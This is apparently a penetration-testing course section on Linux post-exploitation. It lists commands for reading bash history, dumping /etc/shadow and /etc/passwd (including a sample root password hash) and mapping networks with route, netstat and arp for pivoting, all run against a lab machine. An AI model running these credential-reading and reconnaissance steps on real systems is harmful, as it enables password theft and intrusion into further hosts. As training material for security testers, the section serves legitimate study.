12.1 : Post Exploitation - Linux

Post Exploitation

  • After we have obtain access to targets, we can start to look for the valuable information, which includes, but not limited,

  • Acconut & passwords

  • Pivoting attack

  • Private networks

  • Banking / High sensitive information

  • Password hashes

Linux Post Exploitation Command List

Look for the command history

cat ~/.bash_history

Look for old password

cat /etc/shadow | head -n 5
root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::
bin:*:14513:0:99999:7:::
daemon:*:14513:0:99999:7:::
adm:*:14513:0:99999:7:::
lp:*:14513:0:99999:7:::

cat /etc/passwd | head -n 10
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:

Look for pivoting opportunity

locate route
/sbin/route

/sbin/route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.56.0    *               255.255.255.0   U     0      0        0 eth0
127.0.0.0       *               255.0.0.0       U     0      0        0 lo
default         192.168.56.100  0.0.0.0         UG    0      0        0 eth0


locate netstat
netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 0.0.0.0:32768           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        1      0 192.168.56.103:139      192.168.56.101:32811    CLOSE_WAIT  keepalive (6990.88/0/0)
tcp        0      0 192.168.56.103:32773    192.168.56.101:4444     ESTABLISHED off (0.00/0/0)
udp        0      0 0.0.0.0:32768           0.0.0.0:*                           off (0.00/0/0)
udp        0      0 127.0.0.1:32769         0.0.0.0:*                           off (0.00/0/0)
udp        0      0 192.168.56.103:137      0.0.0.0:*                           off (0.00/0/0)
udp        0      0 0.0.0.0:137             0.0.0.0:*                           off (0.00/0/0)
udp        0      0 192.168.56.103:138      0.0.0.0:*                           off (0.00/0/0)
udp        0      0 0.0.0.0:138             0.0.0.0:*                           off (0.00/0/0)
udp        0      0 0.0.0.0:820             0.0.0.0:*                           off (0.00/0/0)
udp        0      0 0.0.0.0:111             0.0.0.0:*                           off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  9      [ ]         DGRAM                    899    /dev/log
unix  2      [ ACC ]     STREAM     LISTENING     1233   /dev/gpmctl
unix  2      [ ]         DGRAM                    1276
unix  2      [ ]         DGRAM                    1251
unix  2      [ ]         DGRAM                    1214
unix  2      [ ]         DGRAM                    1148
unix  2      [ ]         DGRAM                    1072
unix  2      [ ]         DGRAM                    962
unix  2      [ ]         DGRAM                    908
unix  2      [ ]         STREAM     CONNECTED     567


locate arp
...
/lib/modules/2.4.7-10/modules.parportmap
/sbin/arp
/sbin/arping
/sbin/arp
...


/sbin/arp
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.100           ether   08:00:27:5E:55:C8   C                     eth0
192.168.56.101           ether   08:00:27:B9:41:99   C                     eth0